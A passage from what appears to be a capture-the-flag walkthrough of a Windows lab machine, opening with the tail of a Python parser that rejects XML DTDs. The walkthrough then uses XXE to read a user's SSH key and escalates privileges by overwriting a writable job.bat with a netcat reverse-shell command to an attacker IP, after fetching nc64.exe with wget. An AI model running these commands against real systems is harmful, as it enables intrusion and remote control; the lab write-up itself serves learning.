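    p.ExternalEntityRefHandler = forbid     # any attempt to resolve an external entity
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = chars
    p.Parse(xml_bytes, True)
    return {k: v.strip() for k, v in fields.items()}


if __name__ == "__main__":
    # Constructed request in the assumed order format.
    good = b'<?xml version="1.0"?><order><quantity>1</quantity><item>Home Appliances</item><address>Megacorp HQ</address></order>'
    print(parse_order(good))
    # Any DTD is rejected, even one that only defines a harmless internal entity.
    with_dtd = b'<?xml version="1.0"?><!DOCTYPE order [<!ENTITY hi "hello">]><order><item>&hi;</item></order>'
    try:
        parse_order(with_dtd)
    except DtdForbidden as e:
        print("rejected:", e)
```

Rejecting the DTD outright is simpler and safer than trying to distinguish harmless entities from dangerous ones; a shop order has no legitimate need for either. The same idea is what the defusedxml package applies to the standard-library parsers.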

But first, let’s enumerate further. We can find a user “Daniel” in the source code:

Who knows, maybe Daniel still has an account on the server?

  • What username can we find on the webpage’s HTML code? Daniel

Now let’s try to exploit the XXE. Here are some useful payloads. Unfortunately I didn’t manage to get this without the walkthrough, because I was trying a slightly different payload and a different file.

Next, we can try to see if “Daniel” has an account on the machine, and if we might even be able to access his SSH keys. And yes, it works:

We copy the content to a file and adjust the permissions with chmod 600 id_rsa. Then we can login:

$ ssh daniel@10.129.108.32 -i id_rsa

After a bit of poking around, we find an interesting folder called “log-management” with a .bat file inside.

  • What is the file located in the Log-Management folder on the target? job.bat

This is the file content:

We can see that it calls the executable wevutil.exe without specifying the path, and it runs with administrator privileges. Let’s double-check the permissions with icacls:

  • What executable is mentioned in the file mentioned before? wevutil.exe

Since we have full write permissions on the file, we can modify it to execute our own program, for example netcat. First we get nc.exe to the victim machine. Then we simply overwrite the job.bat file with our content.

PS > wget http://10.10.16.18/nc64.exe -O nc.exe
PS > echo "C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443" > C:\Log-Management\job.bat
PS > type job.bat
C:\Log-Management\nc64.exe -e cmd.exe 10.10.16.18 443

In the beginning I tried the exploit with the nc.exe file from the /usr/share/windows-resources/binaries/ folder on Kali, but it didn’t work. So I downloaded nc64.exe from GitHub. After a few seconds, I received the shell.

  • Submit user flag - Try by yourself!
  • Submit root flag - Try by yourself!